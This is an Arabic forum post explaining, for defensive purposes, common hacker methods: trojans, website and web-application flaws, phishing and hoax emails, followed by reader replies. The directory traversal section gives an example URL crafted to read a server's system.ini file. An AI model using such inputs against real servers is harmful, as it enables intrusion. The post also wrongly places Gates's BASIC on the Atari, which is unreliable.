عالم الإنترنت السفلي : الهاكرز .. خفايا و أسرار

لست هنا بصدد كتابة مقالة تشرح لك كيف تخترق موقع ، أو كيف تخترق جهاز ضحية ما ، أو كيف تستولي على بريد إلكتروني ، ولكن سأضع بين يدي القارئ الكريم الخطوط العريضة لأهم الثغرات ، الحيل ، الأساليب ، و الأدوات التي يستخدمها الهاكرز في عملياتهم.

أعترف لك عزيزي القارئ بأنني ترددت كثيراً قبل كتابة هذه المقالة ، ترددت لأن هذه المقالة فعلا ستكون سلاح ذو حدين ، سلاح بيد المبرمج و المطور و مستخدمي الحاسب عموما لكي يعرفوا تماما حجم المخاطر المحدقه بهم و يضعوا في حسبانهم كل ما سيقرأونه في هذا المقالة من حيل و خدع و أساليب قد يستخدمها أحد الهاكرز تجاههم ، وهي سلاح أيضاً بيد من يمتلك نوايا سيئه و خبيثه و يريد فقط من يدله على بعض الأساليب و الحيل ليكون قد وضعه قدمه على أول الطريق في مجال تعلم و إحتراف الإختراق. لذا أستأذنك عزيزي القارئ بعدم الخوض في بعض التفاصيل ، فسأكتفي بشرح بعض الأمور شرحاً واضحا يوصل المعلومة بشكل كامل ولكن قدر المستطاع لن يستفيد أي شخص من هذه المعلومه لإستخدامها أغراض سيئه ( أعلم ان ذلك سيكون صعب ، ولكني سأحاول )

ملاحظة : فليعذرني القارئ الكريم إن كانت هناك مصطلحات عربية غير مفهومه ، فقد إستخدمت مصطلحات التعريب القياسية في بعض أرجاء هذه المقالة ، و أحيانا أخرى أضطررت لتعريب بعض المصطلحات بنفسي لعدم معرفتي بتعريب قياسي لهذا المصطلح !

من هو الهاكر ؟

تعارف الناس على إطلاق مصطلح هاكر على الشخص الذي يقوم بإختراق التطبيقات أو الأجهزة أو الشبكات ، أو يقوم بالتحايل للحصول على معلومات حساسة ( مثل بطاقتك الإئتمانية ، حسابك البنكي ، معلومات بطاقة التأمين ... الخ) ، في هذه المقالة سنستخدم هذا المصطلح للدلالة على هذا المفهوم ، ولكن لكي نضع الأمور في نصابها ، أود أن أوضح أن هذا المصطلح بهذا المفهوم خاطئ ، نعم هو كذلك ، مصطلح هاكر يطلق أساساً على الشخص الذي يمتلك قدرات خارقة في مجال البرمجة و التطوير و لديه موهبة عالية في التفكير المنطقي و الرياضي و يستطيع حل أي مشكلة برمجية مهما كانت معقدة بسرعة فائقة و بالطريقة الأمثل ، نذكر على سبيل المثال ، بيل جيتس مؤسس شركة مايكروسوفت و كبير المهندسين فيها ، يصنف هذا الرجل علميا ضمن فئة الهاكرز في المفهوم الصحيح للكلمة ، حيث يمتلك هذا الرجل قدرات برمجية مذهلة ، نذكر منها على سبيل المثال برمجته للغة BASIC في 8 أسابيع فقط ! علما أنه قام بتطوير هذه اللغة لصالح جهاز جديد حينها يطلق عليه ATARI لم يكن بيل جيتس يمتلك هذا الجهاز ، و أعتمد فقط في برمجته للغة على الدليل الورقي لمعمارية الجهاز ، و المذهل أنه قام بعرض اللغة على أحد الشركات و قام بتشغيل برنامج مفسر اللغة ( Interpreter ) لأول مرة بدون أي عملية تجربة سابقة ( لأنه لم يكن يمتلك الجهاز الذي صنع من أجله هذه اللغة ) ، و كانت النتيجة برنامج يتنفذ بدون ظهور أي خطأ ! هذا أمر يعتبر في عرف المبرمجين أمر خرافي ، لأن اي برنامج مهما كان صغير لا بد و أن تظهر فيه (غالبا) أخطاء كثيرة وقت البرمجة و بعد ذلك ، فما بالك حينما يكون البرنامج هو مفسر للغة برمجة جديدة ! حيث تعتبر برمجة المفسرات Compilers or Interpreter من أعلى و أعقد مراتب البرمجة. هذا مثال على شخص يطلق عليه مسمى هاكر بالمفهوم الأساسي لمعنى الكلمة .عموما سنستخدم كلمة هاكر في هذه المقالة للدلالة على المعنى الدارج و المنتشر وهو الشخص الذي يستخدم قدراته التقنية لأغراض خبيثه و غير شرعية.


الهاكرز و جهازك الشخصي

عادة تكون أولى خطوات الهاكر المبتدئ هي محاولة إختراق الأجهزة الشخصية ، عملية إختراق الأجهزة الشخصية عملية سهلة نسبياً ، لذا تكون هي الخطوة الأولى في رحلة ذلك الهاكر (إن صح تسميته هاكر ) ، على الرغم من إنتشار برامج الحماية في الفترة الأخيرة و إزدياد الوعي لدى مستخدمي الإنترنت ، الى أنه ما زال هناك من تنطلي عليه حيل بعض هؤلاء الهاكرز ليتمكنوا من السيطرة على جهازه ، بشكل عام لن يتمكن أي هاكر من إختراق جهازك الا اذا كان الجهاز مصاب ببرنامج يفتح باب خلفي Backdoor يسهل دخول الهاكر إلى الجهاز ، هذه البرامج التي تفتح أبواب خلفية في جهازك تسمى أحصنة طرواده Trojan Horses و وظيفتها بالتحديد فتح منفذ Port في جهازك يستخدمه الهاكر عن طريق برنامج إختراق جاهز و معد مسبقاً يحتوي على كافة الخصائص و الخدمات التي تخدم أغراض الهاكر و تسهل عليه مهامه ، على سبيل المثال ، سيتمكن الهاكر من قراءة كل حرف تكتبه على لوحة المفاتيح أثناء إتصالك بالإنترنت ، أيضا سيكون بوسعه سحب كافة كلمات المرور الخزنه في الذاكرة ، سيستطيع أيضا فتح ملفاتك ، قراءة رسائلك ، و مشاهدتك عبر الكاميرا ، بل سيستطيع مشاركتك في المواقع التي تتصفحها و المحادثات التي تجريها !


صورة لبرنامج صب سفن - برنامج اختراق الأجهزة الشخصية

صورة لبرنامج سب سفن الشهير في مجال إختراق الأجهزة الشخصية

تنطلق شرارة المشكلة عندما تقوم بفتح تطبيق أو ملف لا تعرف مصدره سواء كان هذا الملف مرسل اليك عن طريق البريد الإلكتروني أو قمت بنفسك بتحميله على جهازك من أحد المواقع أو أحد الأقراص التي حصلت عليها ، بعض ملفات التجسس (أحصنة طروادة) تكون مضمنه ضمن خلفية شاشة جميله أو لعبة صغيرة أو برنامج تطبيقي آخر مشهور ! عند تشغيلك لهذا التطبيق تكون ببساطة فتحت باب خلفياً Backdoor للهاكرز و سيكون بمقدوره إختراق جهازك و العبث فيه ، كل ما سيحتاجه معرفة رقم الأي بي الخاص بك وقت إتصالك وهذه المعلومة من السهل جداً الحصول عليها بحيل و اساليب لن أسهب في ذكرها خوفاً من أن تستغل إستغلالاً سيئ !


النصيحة : لا تفتح أي ملف أو برنامج يصلك عبر البريد الإلكتروني من شخص غير معروف ، أو تجده في موقع غير مشهور ، و تأكد دائما من تحديث مضاد الفايروسات و ملفات التجسس في جهازك بشكل دوري ( كل أسبوع على الأكثر ) ، كما تأكد من تركيب جدار حماية Firewall جيد مثل برنامج زون ألارم Zone Alarm لحماية منافذ الجهاز و إغلاق المنافذ المشهورة التي تستخدمها بعض تطبيقات الإختراق المنتشرة بين يدي المبتدئين من الهاكرز !



الهاكرز و مواقع الويب

هذا الفرع قد يكون متشعب جدا ، و يصعب فعلاً تغطيته في مقالة أو حتى عشرة مقالات لأن هناك العديد من الحالات و الأساليب التي يمكن نصنفها تحت مسمى إختراق المواقع ، فمن الممكن مناقشة هذا الموضوع من جهة مطوري الموقع ، أو من جهة أصحاب و ملاك المواقع ، و نظرا لأهمية الناحيتين ، فسأناقش الموضوع من هذين الجانبين بشكل مختصر و غير مخل بإذن الله.

أصحاب المواقع .. و الإختراق

أنت تمتلك موقعا ، اذا بياناتك متاحة لملايين البشر ، يفصلها عنهم فقط زوج من البيانات (إسم مستخدم و كلمة مرور ) ، الحصول على زوج البيانات هذا هو مهمة ذلك الهاكر ، و أحيانا يكون غير مضطر لمعرفة هذه البيانات ، ببساطة يمكن للهاكر إستغلال أحد ثغرات نظام التشغيل في سيرفر الشركة المستضيفة لموقعك ، أو إستغلال ثغرة من ثغرات التطبيقات التي تقوم بتركيبها في موقعك مثل المنتديات أو المجلات الإلكترونية أو أي تطبيق تقوم بتركيبه ، معرفة هذه الثغرات ليس بالأمر الصعب ، يكفي أن يقوم أحد الهاكرز بالإشتراك بالرسائل الإخبارية التي تأتي من شركة VB المنتجه لبرنامج المنتديات الشهير و التي تبلغ عن أي ثغرة تكتشف في النظام ليذهب ذلك الهاكر مسرعا يبحث عن منتدى لم يقم بالترقية بعد و يستغل تلك الثغرة فيه !

نصائح أمنية لأصحاب المواقع :

1- تأكد من شركة الإستضافة التي تتعامل معها من إصدارة نظام التشغيل و لوحات التحكم لديهم و قم بالبحث عن هذه الإصدارات و تأكد ما اذا كانت تحتوي على ثغرات خطيرة أو لا.

2- إستخدم في موقعك فقط البرمجيات التي تحتاج اليها فكرة الموقع فقط، اذا كنت لست بحاجة ماسة إلى سجل زوار ، فلا تضعه ، اذا لم تكن بحاجه لمحرك بحث داخلي ، فلا تضع.

3- ركب دائما أحدث النسخ من البرمجيات التي تستخدمها في الموقع ، سواء المنتديات أو المجلات الإلكترونية.

4- لا تبالغ في تركيب الإضافات الغير أساسية على التطبيقات ، هذه الإضافات ( تعرف أيضاً بالهاكات) تساهم كثيرا في فتح ثغرات في موقعك ، وذلك لأنها صممت و برمجت من قبل هواة ولم تبرمج من قبل الشركة المنتجه لنفس البرنامج ( على سبيل المثال الهاكات المستخدمة في برامج المنتديات هي في الغالب سبب إختراق معظم المنتديات ، و العجيب أننا نرى بعض أصحاب المنتديات يتفاخرون بعدد الهاكات التي يستخدمونها و التي هي في الحقيقة أبواب خلفية مفتوحة لإختراق مواقعهم !! )

5- أحرص دائما على تتبع أخبار البرمجيات التي تستخدمها في موقعك و تأكد من أنك تقوم بالترقية في حالة وجود ثغرة خطيرة وليس فقط في حالة وجود ميزة جديدة في البرنامج ، كثرة الترقيات المبالغ فيها قد تسبب لك المشاكل ايضاً.

6- لا تثق في أحد ، لا تعطي بيانات موقعك لأي جهة غير رسمية ، قد تحتاج الى تركيب برنامج أو تصليح مشكلة في موقعك ، تأكد من أنك تتعامل مع مواقع و جهات على درجة عالية من الموثوقية وليس مع بعض الهواة في المنتديات.

7- راقب سجلات الدخول Logs في موقعك متى ما أحسست أن هناك أمر مريب يجري ، سجلات الدخول كنز من المعلومات يجدر بك إستغلاله للأغراض الأمنية أو الإحصائية

8- حدد صلاحيات المشاركات في موقعك ، اذا كنت تمتلك منتدى فلا تسمح للأعضاء بإضافة وسوم HTML أو جافا سكريبت ، أحدهم قد يسرق ملفات الكوكيز الخاصة بك بهذه الطريقة !!

إذا لم تكن قادرا على تولي تنفيذ هذه النصائح الأمنية بنفسك ، فيمكنك إستئجار جهة خارجية لتقوم بذلك عنك ، أحد أفضل المواقع العربية في هذا المجال هو موقع الحلول الأمنية و المتخصص بتقديم الخدمات الأمنية لأصحاب المواقع



الهاركز يا مطوري تطبيقات الويب !

هل سمعت عن XSS ؟ ، هل تعرف ما هي حقن لغة الإستعلام SQL Injection ، هل قرأت عن إقتحام الجلسات Session Hijacking ، حسنا ، هل قرأت عن الـ CRLF Injection، ماذا عن الـ Directory Traversal ، و ماذا عن التلاعب بالمتغيرات Parameters Manipulation ?

حسناً ... هذه الأسئلة ستعطي إنطباع عن أن الموضوع متشعب جداً ، لم أذكر هنا الا أهم و أشهر أنواع المشاكل و الثغرات التي يستغلها الهاكرز لتدمير التطبيقات التي تبرمجها ، و اذا كنت لم تسمع بواحد أو أكثر من هذه المصطلحات ، فأنت في خطر !

بما أن هذا الجزء من المقالة يهم مطوري المواقع أكثر من غيرهم ، فلن أسهب كثيراً بشرح هذه المصطلحات و طريقة عملها ، أتوقع أنك كمطور قادر على البحث بنفسك عن تفاصيل هذه المصطلحات و معرفة ما هو المعني البرمجي لها بالضبط ، عموما ، سأذكر رؤوس أقلام عن هذه المصطلحات للمهتمين بتنمية ثقافتهم الأمنية في شتى المجالات.

الـ Cross Site ******ing

يطلق عليها إختصاراً xss وليس CSS تميزاً لها عن صفحات الأنماط المتعددة Cascading Style Sheet، بإختصار هي نوع من الهجمات التخريبية على تطبيقك يحدث عندما يتمكن أحدهم من إدخال بيانات مختطلة مع بعض الأوامر في نماذج صفحات موقعك ينتج عن ذلك تشويه شكل صفحة موقعك أو إظهار رسائل خطأ متكررة عند زيارة الصفحة التي تم تخريبها، أو سرقة بعض البيانات الحساسة من الزوار أو صاحب الموقع نفسه ! ، تنتج هذه المشكلة نتيجه عدم فحصك لمدخلات الزوار في النماذج و سماحك لهم بإدخال وسوم HTML أو Java ****** في نماذج الموقع مما يجعلهم قادرين على تلويث صفحات موقعك بشيفرات ليست جزء من شيفرة تطبيقك الذي كتبته ! يمكن للهاكر أيضاً العبث في المتغيرات التي يمررها تطبيقك عن طريق عناوين URL و إضافة أجزاء اليها تجعله قادر على السيطرة جزئيا أو كلياً على تطبيقك ، أو على الأقل تشويه شكل التطبيق ، لعلك تتذكر عزيزي القارئ الثغرة التي كان مصاب بها نظام بريد الـ Hotmail قبل سنتين تقريبا ، و التي كانت تسمح للهاكر بقراءة صندوق البريد الوارد للضحية ، تلك الثغرة كانت تصنف تحت الـ XSS !


الـ SQL Injection

تحت هذه النقطة سأحيلك عزيزي القارئ إلى مقالة كتبتها سابقا عن هذا الموضوع بالتحديد ، المقالة هي : الـ SQL Injection سلاح الدمار الشامل ضد تطبيقات الويب ، أتمنى أن تستمتع بقراءة تلك المقالة ، الموضوع خطير و يستحق مقالة منفردة.


إقتحام الجلسات Session Hijacking

إقتحام الجلسات هي عملية السيطرة على جلسة المستخدم Session الذي يقوم بإستخدام النظام ، عملية إقتحام الجلسه تلزم أن يقوم الهاكر بإلتقاط رقم الجلسة Session ID ، أو توليد إجباري لها Brute Force أو إعادة توليد للرقم Reverse Engineering ، قد يبدو المفهوم صعب حالياً لذا سأسترسل بشرحه أكثر.

من المعروف أن هناك نوعين من الجلسات الجلسات الدائمة Persistent وهي التي يتم من أجلها تعريف ملفات الإرتباط (الكوكيز) و حفظها في جهاز المستخدم لكي يتعرف عليه النظام عند عودته في أي وقت مرة أخرى ! ، النوع الثاني هي الجلسات الغير دائمة non-Persistent وهي التي تنتهي بمجرد إغلاق المستخدم للمتصفح ، في كلا النوعين يتم تعريف رقم جلسة Session ID للمستخدم ، رقم الجلسه هذا يستخدم لمعرفة متغيرات المستخدم الذي يرسلها أو يستقبلها خلال جلسته على النظام ، هذا الرقم ينشئ عادة بشكل إفتراضي من لغة البرمجة التي تستخدمها من خلال رقم أي بي المستخدم وقت الجلسه يدمج معها بعض المتغيرات الأخرى ، بعض المبرمجين يكتفي بتوليد هذا الرقم بشكل إفتراضي دون أن يسعى لتشفيره أو إضافة المزيد من العوامل عليه لجعل عملية التوليد الإجباري أو إعادة التوليد له صعبة ، و هنا تكمن المشكلة حيث يقوم الهاكر بمحاولة توليد رقم الجلسه بمعرفة بعض المعطيات اللحظية و يرسلها عن طريق HTTP Request إلى النظام الذي يقرأ رقم الجلسه و يقارنه برقم الجلسه الموجود لديه في الذاكرة ، فإذا تطابق ، فهذا يعني من وجهة نظر النظام أن الهاكر هو المستخدم الحقيقي ، و يمنحه بذلك حق الوصول لمنطقة المستخدم الخاصة ( حسابه البنكي على سبيل المثال !! ) ، الجدير بالذكر أن هجمات الـ xss يمكن أن تستخدم للإستيلاء على الجلسات و ذلك عن طريق تمرير كود جافا سكربت للنظام يقوم بقراءة رقم جلسة المستخدم و ارسال هذا الرقم للهاكر !

نصائح لتجنب هذا النوع من المشاكل

1- حاول تشفير رقم الجلسه و تعقيدها قدر المستطاع

2- إستخدم الـ SSL لتشفير كافة البيانات الحساسة المرسلة و المستقبلة من و إلى نظامك

3- برمجياً قم بإنهاء أي جلسه يمضي عليها وقت كافي تقدر بأن المستخدم خلالها قد إنتهى فعلاً من عمله خلالها أو انه قد ترك شاشة النظام مفتوحة و لم يعد يستخدمها

4- حصن نظامك ضد هجمات الـ XSS


الـ CRLF Injection

مصطلح CRLF هو إختصار لـ Carriage Return , Line Feed ، الـ CR هو رمز الأسكي 13 و الـ LF هو رمز الأسكي 10 ، هذان الرمزان يستخدمها الويندوز عند الضغط على زر Enter ( أي للنزول إلى سطر جديد )، نظام لينكس يستخدم فقط الرمز LF ، بإختصار هذا النوع من الهجمات ليس خطير للغاية ، أقصى ما يمكن للهاكر فعله من خلال هذه النوعية من الثغرات هو تشويه شكل الصفحة ، بالتأكيد هذه المشكلة قد تكون حساسه حسب نوعية التطبيق الذي تقوم ببرمجته. هذا النوع من الهجوم يكون أيضا بسبب عدم فحص مدخلات المستخدم ( تماما كالـ SQL Injection و الـ xss ) ، تأكد من أن المستخدم لا يدخل علامة \n\r في المدخلات ( الا في الأماكن التي يسمح بها للمستخدم بإستخدام هذه الرموز للنزول الى سطر جديد ) ، مثلا في نص الموضوع الذي يكتبه العضو في المنتدى يجب أن تسمح له بإستخدام زر Enter ( الذي يتحول عند الضغط عليه إلى \n\r ولكن غير مرئية ! ) ، ولكن في عنوان الموضوع سيكون السماح للمستخدم بإدخال رمز CRLF مشكلة كبيرة !!


التجول في المجلدات Directory Traversal

هذا النوع من الهجمات خطر فعلا ، لن أبالغ اذا قلت انه اخطر أنواع الهجمات على الإطلاق ، ما يخفف من وطئته هو أنه صعب التطبيق لأن التطبيقات التي يمكن إستغلال هذا النوع من الثغرات فيها محدودة جداً ، ولكن هذا لا يمنع من أنه خطر و خطر جداً ! فكرة هذا النوع من الهجمات ببساطة هو أن يتمكن الهاكر من الخروج عن نطاق مجلد الجذر للموقع Root directory إلى مجلدات أخرى تعلو المجلد الجذري في المستوى ، دعني أضرب مثال لتوضيح الصورة ، في سيرفرات الويندوز التي تعمل بالـ IIS يكون مجلد الجذر للموقع عادة هو :

C:\Inetpub\wwwroot

وهذا المجلد هو الذي تتواجد فيه ملفات موقعك ، و بالتالي فإن الزوار سيتمكنون فقط من تصفح الملفات الموجودة في هذا المجلد و المجلدات الفرعية الموجود بداخله ، ومنها على سبيل المثال مجلد news ، الصورة في الأسقل تعطيك إنطباع عن التسلسل الشجري للمجلدات التي سأضرب مثال عليها .

ثغرة من ثغرات تطوير المواقع

الأن تخيل لو أن لديك عنوان في تطبيقك الذي برمجته بهذا الشكل

http://www.yoursite.com/news/show.aspx?view=file.html

العنوان يقوم بإستدعاء الملف file.html و عرضه للمستخدم ، الملف file.html يفترض أن يكون موجود في نفس مجلد news ، إفترض الأن لو أن الهاكر قام بالتلاعب في العنوان و كتبه بهذا الشكل :


http://www.yoursite.com/news/show.as...ows/system.ini

مصيبة ... لقد تمكن من مشاهدة ملف الـ System.ini !! ماذا لو أن التطبيق الذي برمجته يسمح بالتعديل على محتوى الملف ، سيتمكن الهاكر حينها من التعديل على ملف System.ini ، مما يعني تحكم كامل في موقعك من نظام التشغيل ، ليس فقط في الموقع بل و في كامل السيرفر المستضيف لموقعك ! الأسوء من ذلك تخيل لو ان نظامك يسمح بتشغيل بعض التطبيقات على الموقع عن طريق أوامر الشل ( يفترض أن لا تبرمج هذا النوع من التطبيقات ! ) ، لو تمكن الهاكر من الخروج من المجلد الجذري كما في المثال السابق ، قد يتمكن من الوصول الى سطر الأوامر الرئيسي و تنفيذ أمر Format للسيرفر بأكمله !!

هذا النوع من الهجمات يمكن أن يحل بطريقتين ، و برأيي يجب أن تستخدم الطريقتان لحل المشكلة :

1- من خلال الشيفرة التي تكتبها ، تأكد من فحصك لكافة المدخلات و المتغيرات الممررة إلى النظام ، تأكد من أنها تقع ضمن النطاق المسموح به

2- من خلال إعدادات السيرفر الذي تمتكله ( أو تمتلكه الشركة المستضيفه لموقعك ) يمكن ضبط هذه الإعدادت بحيث يتم منع أي طلب للوصول الى أي ملف خارج المجلد الجذري للموقع نفسه ، قم بفحص السيرفر بنفسك مبدئيا عن طريق السماح من خلال الشيفرة بأن تفتح ملف يقع خارج المجلد الجذري لموقعك ، إن إستطعت ذلك فهذا يعني أن إعدادات السيرفر المستضيف لموقعك غير آمنة و يجب أن تعدل بحيث يمنع السيرفر نفسه طلب أي ملف خارج نطاق المجلد الرئيسي ، أطلب من الشركة المستضيفة لموقعك تعديل ذلك ، و بدورك عدل الشيفرة كما ذكرنا في النقطة رقم 1 لمزيد من الحماية .



التلاعب بالمتغيرات Parameters Manipulation

أحد أشهر حيل الهاكر للوصول الى فهم كامل عن طريقة تعاملك مع المتغيرات الممرره الى النظام الذي قمت ببرمجته ، يتم ذلك عن طريق التلاعب بالمتغيرات الممرره إلى العنوان URL و تغيير قيمها أو إرسال قيم مخالفة لنوعية المتغير نفسه ، بحيث يستطيع الهاكر معرفة رسائل الخطأ التي تصدر من النظام حينها ، هذه الرسائل ستساعد الهاكر على فهم أكبر لتركيب النظام لديك . أيضا قد يستخدم الهاكر طريقة التلاعب بالمتغيرات لتمرير متغيرات جلسه Session عن طريق العنوان مباشرة و ليس من خلال المتصفح نفسه بالـ HTTP Request ، في لغة البرمجة التي تستخدمها يفترض أن يكون هناك طريقة لمعرفة ما اذا كان متغير الجلسه هذا ممرر عن طريق الطلب HTTP Request من المتصفح نفسه ، أو من العنوان URL !

كمثال أخر على هذا النوع من الهجمات ، نماذج صفحات الويب التي تقوم بتصميمها ليقوم الزائر بتعبئتها ، إما لغرض المراسلة أو التسجيل في الموقع أو شراء سلعة ... الخ ، يسهل على الهاكر قراءة أسماء عناصر النموذج ، هذه الأسماء بالتأكيد ستسخدمها أنت كمتغيرات في البرنامج الذي قمت ببرمجته ، إنطلاقا من هذه المعلومة يستطيع الهاكر إستخدام النموذج (أو صنع نموذج مشابه ) مع تعديل قيم بعض الحقول لإحداث أثر ما على موقعك ، لكي أوضح المسألة ، دعني أذكر لك هذه القصة ، موقع التسوق الخاص بشبكة ياهوو Yahoo Shopping ، كان يستخدم طريقة محددة لتمرير سعر السلعة إلى صفحة الدفع ، فعند إختيارك للسلعة و تعبئته لنموذج بيانات الشحن ، يكون سعر السلعة أو السلع التي أخترتها موجود في نفس نموذج الشحن و لكن في حقل مخفي Hidden لا يظهر للزوار و لكنه موجود في شيفرة HTML ، قام أحد الهاكر حينها بتعديل شيفرة الـ HTML و قلل من سعر السلعة التي أرادها إلى دولار واحد ، و من ثم قام بتمرير الطلب بشكل طبيعي إلى صفحة الدفع ، التي حسمت السعر (دولار واحد ) من بطاقته الإئتمانية و ظهر لمسؤولي الشحن أن هذا الرجل قد تمت عملية إستخلاص المبلغ من بطاقته بنجاح و أنه يستحق الشحن للسلع التي طلبها !! الجميل في الأمر ان المشكلة أكتشفت فوراً و مصادفةً من أحد مسؤولي أمن المعلومات في أحد الشركات العالمية و الذي قام بتنبيه ياهوو حينها لتراجع سجلات المدفوعات لديها خوفا من أن تكون هذه الثغرة أستغلت بكثرة حيث وجدت أنها أستغلت فقط لمرة واحده !

حسنا أخي المطور ، أعتقد انني إستطعت من خلال هذه النقاط المختصرة تنبيهك إلى خطر محدق قد يسبب في ضياع جهدك في التطوير و التصميم بسبب أخطأ قد تبدو تافهه ، ولكنها تكلف الكثير أحيانا !! أعتقد أنني يجب أن افرد مقالة كاملة عن كل نوع من أنواع هذه الثغرات ، أعدك عزيزي القارئ أنني سأفكر في هذا الأمر بشكل جدي



رسائل الإحتيال Phishing Scam

سمي عام 2004 بعام رسائل الإحتيال Phishing Scam ، و أعتقد ان عام 2005 كان له نصيب أكبر كذلك ، رسائل الإحتيال ببساطة هي رسائل تصلك على بريدك الإلكتروني ، يدعي فيها مرسلوها أموراً يهدفون منها الى تحقيق مكسب مادي أو معنوي ، و أحيانا قليله لغرض التسلية فقط ، على سبيل المثال ، ظهرت قبل بضعة أشهر في المملكة العربية السعودية رسالة بريد إلكتروني أرسلت إلى عدد كبير جدا من الستخدمين ، تظهر هذه الرسالة للوهلة الأولى بأنها مرسلة من بنك سامبا ، حيث تطلب منك الرسالة ضرورة تحديث بياناتك البنكية عن طريق رابط موجود في نص الرسالة ، هذا الرابط يقودك إلى موقع مطابق في التصميم لموقع سامبا يطلب منك المحتال من خلاله إدخال بياناتك ( إسم المستخدم و كلمة المرور و معلومة إضافية هي رقم بطاقة الأحوال ! ). هذا مثال على أحد رسائل الإحتيال التي ظهرت في المملكة العربية السعودية ، و هذا النوع من الرسائل يظهر بشكل يومي في أمريكا و أوروبا . و فيما يلي أسرد لك عزيزي القارئ مجموعة من أشهر أنواع رسائل الإحتيال :

1- رسائل تطلب منك إدخال بياناتك البنكية على أساس انها مرسلة من البنك الذي تتعامل معه.

2- رسائل تطلب تسجيل معلوماتك الشخصية لأنك ربحت جائزة كبيرة !

3- رسائل تدعي انها من موقع البريد الإلكتروني ( هوتميل مثلاً ) ، تطلب منك إعادة إدخال كلمة المرور !

4- رسائل تطلب منك إدخال معلومات حساسة و تدعي بأنها من خلال هذه المعلومات ستقرأ مستقبلك أو تخبرك مدى توافقك مع شريك حياتك ... ، في الحقيقة هذه المعلومات طلبها صديق لك يريد معرفة اسرار حياتك

5-رسائل تدعي بأنها شركات لتشغيل الأموال في تجارة العملات و تدعي بأنها تملك برنامج مخصص لتبادل العملات العالمية !


هناك العديد من أنواع الرسائل التي قد يخترعها أي شخص لأغراض التحايل ، لا تثق باي رسالة تطلب منك أي معلومة شخصية ، مهما بدت لك هذه المعلومة تافهه ، و مهما كان شكل الرسالة يوحي بأن مرسلها جهة موثوقة تعرفها جيدا ، حتى ولو رأيت أن عنوان البريد المرسله من هذه الرسالة هو عنوان بريد جهة رسميه ، فلا تثق بذلك بتاتا ، من السهل جدا أن أرسل لك رسالة تظهر لك بأن مرسلها هو العنوان : bush@whitehouse.gov ، فهل أنا الرئيس جورج بوش ؟



الرسائل المضلله Hoax Email

هذا النوع من الرسائل لا يسبب غالباً أخطار كبيرة ، ولكنه مزعج ، و أحيانا مضحك ! هذه الرسائل تحتوي عادة على تحذيرات كاذبة من فايروس ليس له وجود و إنما ترسل هذه الرسالة لغرض إثارة الذعر ، أو تسبيب أضرار في أحيان كثيرة ، إنتشار هذه الرسائل على النطاق العربي محدود جداً و كان آخرها رسالة مضحكة تحذر بأن الملف jdbgmgr.exe الموجود في نظام التشغيل ويندوز كملف أساسي من ملفات النظام هو فايروس يستهدف العرب دون غيرهم و أن مرسله شخص يهودي يقصد إستهداف المسلمين و العرب !! ، طبعا هذه الشائعة إنتشرت في رسالة Hoax قبل حوالي سنتين باللغة الإنجليزية (لم يروج حينها أن صاحب الفايروس يهودي يستهدف المسلمين ! ) ، يبدو أن صاحبنا مبتدع النسخة العربية من هذه الرسالة مغرم بنظرية المؤامرة !

لمعرفة معلومات أكثر عن الرسائل المضلله و قائمه بأخر الرسائل المضلله التي تظهر على الساحة :

http://www.symantec.com/avcenter/hoax.html


كلمة أخيرة

من خلال هذه المقالة حاولت تسليط الضوء على عالم الهاكرز و أشهر الحيل و الثغرات التي يستخدمها الهاكرز ، و على الرغم من تشعب الموضوع و كثرة فروعه ، الا انني حاولت أن أطرق معظم الأبواب أحيانا بأسلوب تقني بحت ، و أحيانا بأسلوب عام يتمكن من فهمه جميع مستخدمي الحاسب الآلي ، أعلم أن هناك العديد من المشاكل و الثغرات لم أتطرق لها ، منها ما يتعلق بعمليات التنصت على الشبكات Sniffing و منها ما يتعلق بعمليات الإدعاء Spoofing و منها ما يتعلق بهجمات الحرمان من الخدمة DOS أو جمع المعلومات التحليلية بغرض التخطيط لعملية الإختراق الفردي أو الجماعي ... ، عدم تطرقي لهذه المواضيع كان لسببين ، أولا بسبب شدة تخصصها لدرجة أظن معها بأن المقالة ستفقد جاذبيتها و بساطتها ، و السبب الثاني هو أن هذه المواضيع هي عناوين عريضة جدا يمكن أن نؤلف بها كتبا وليس مقالات ولا أريد أن أضع عناوين غير موضحه بشكل كافي لكي لا أدع القارئ مشتت و قد يخرج من قراءة هذه المقالة بإنطباع سلبي !

أتمنى أن أكون قد وفقت في طرح الموضوع بشكل سليم و وافي ، و أرغب بسماع تعليقاتكم الكريمة التي بالتأكيد ستزيدني حماس و شكرا:icon30:

شكرا ليك على الموضوع الهايل ده بس ياريت كمان تعرفنا شوية حاجات عن كيفية التهكير عشان نحمى نفسنا ونوقف الناس اللى بتستعرض قدراتها علينا عند حدهم مش لاى غرض تانى والله العظيم

شكرا اخي العزيز على النصائح الغاليه
بس خدها نصيحه مني انا
الهكر بيعتمد على 90% ذكاء
5 % برامج
5% غباء الضحيه

مشكووووووور جدا

شكرا يا اخى على المعلومات القيمة و المفيدة

و ياريت لو سمحت تشرح قليلا sniffing علشان معظم الناس مشتركين فى شبكات علشان الدى اس ال

و احنا طبعا عايزين نحمى نفسنا لو فى اى حد فى الشبكة بيعمل هاكنج..

و شكرا يا باشا على الموضوع الجميل

الف شكر على المعلومات الهامة وربنا يستر

الموضوع ده جامد جدا جدا جدا
وأشكرك كثيرا على هذه المعلومات

شكرا لكل من رد على موضوعى

تم تثبيت الموضوع لأهميته وشكرا للأخ shiko ahmed على الموضوع الجميل

الف شكر ياباشا علي الموضوع الجامد ..
معلومات جميلة جدا
جزاك الله كل خير ....

الموضوع ده جامد جدا جدا جدا
وأشكرك كثيرا على هذه المعلومات

موضوع جميل جدا جدا
وفعلا عندك حق انك ما اتكلمت كتير ودخلت فى تفاصيل الهاكر
بس ياريت لو تضيف حاجه عن الهاكر عن شبكات الدى اس ال
لان اغلبنا مشتركين فى شبكه
عندى سؤالين بس لو تقدر تضيف على الموضوع شرح على حكايا هاكر الشبكات
1- هو ممكن اى حد يعرف انا فاتح موقع ايه ..........ممكن يكون اللى عندو الراوتر يعنى ولا ايه؟
2- بالنسبه للمحادثات هل يمكن اى حد يقدر يشوف الكلام اللى بكتبو....علما بانى بستخدم برنامج انتى فيروس كاسبر سكاى ومعنديش فيرول علشان بستخدم تحميلات التورنت


شكرا ليك على العموم

: شكرا على التثبيت

بالنسبة للاخ Salsa222
فممكن حد يعرف انت فاتح موقع اية بالضبط
بالنسبه للمحادثات لااعتقد حد يقدر يشوف الكلام اللى بتكتبوا
وان انشاء اللة اشرح حكايا هاكر الشبكات
وشكرا على ردك.......

الف الف الف شكر

بسم الله الرحمن الرحيم


من هم الهكرز و تاريخ بدايته و الحمايه منه

تاريخ وبداية
